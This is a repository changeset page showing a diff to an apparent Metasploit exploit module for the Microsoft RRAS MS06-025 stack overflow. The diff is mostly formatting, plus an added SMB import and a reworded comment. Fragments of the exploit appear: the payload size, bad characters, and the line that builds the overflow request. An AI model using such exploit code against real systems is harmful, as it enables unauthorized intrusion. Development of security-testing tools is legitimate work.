Changeset 3735

Show
Ignore:
Timestamp:
06/28/06 11:34:17 (2 years ago)
Author:
hdm
Message:

Cleaned up original rras, added new rasman/registry

Files:

Legend:

Unmodified
Added
Removed
Modified
Copied
Moved
  • framework2/trunk/exploits/rras_ms06_025.pm

    r3719 r3735  
    1313 
    1414use Pex::DCERPC; 
     15use Pex::SMB; 
    1516use Pex::NDR; 
    1617 
     
    2425        'Name'    => 'Microsoft RRAS MSO6-025 Stack Overflow', 
    2526        'Version' => '$Revision: 1.1 $', 
    26         'Authors' =>  
    27         [  
     27        'Authors' => 
     28          [ 
    2829                'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>', 
    2930                'H D Moore <hdm [at] metasploit.com>' 
    30         ], 
     31          ], 
    3132 
    3233        'Arch' => ['x86'], 
     
    3536 
    3637        'AutoOpts' => { 'EXITFUNC' => 'thread' }, 
    37         'UserOpts' => { 
     38        'UserOpts' => 
     39          { 
    3840                'RHOST' => [ 1, 'ADDR', 'The target address' ], 
    3941 
     
    4547          }, 
    4648 
    47         'Payload' => { 
     49        'Payload' => 
     50          { 
    4851                'Space'    => 1104, 
    4952                'BadChars' => "\x00", 
     
    177180        } 
    178181 
    179         # need to produce an exception 
     182        # We need to produce an exception 
    180183        my $request = $pattern . Pex::Text::AlphaNumText(0x4000 - length($pattern)); 
    181184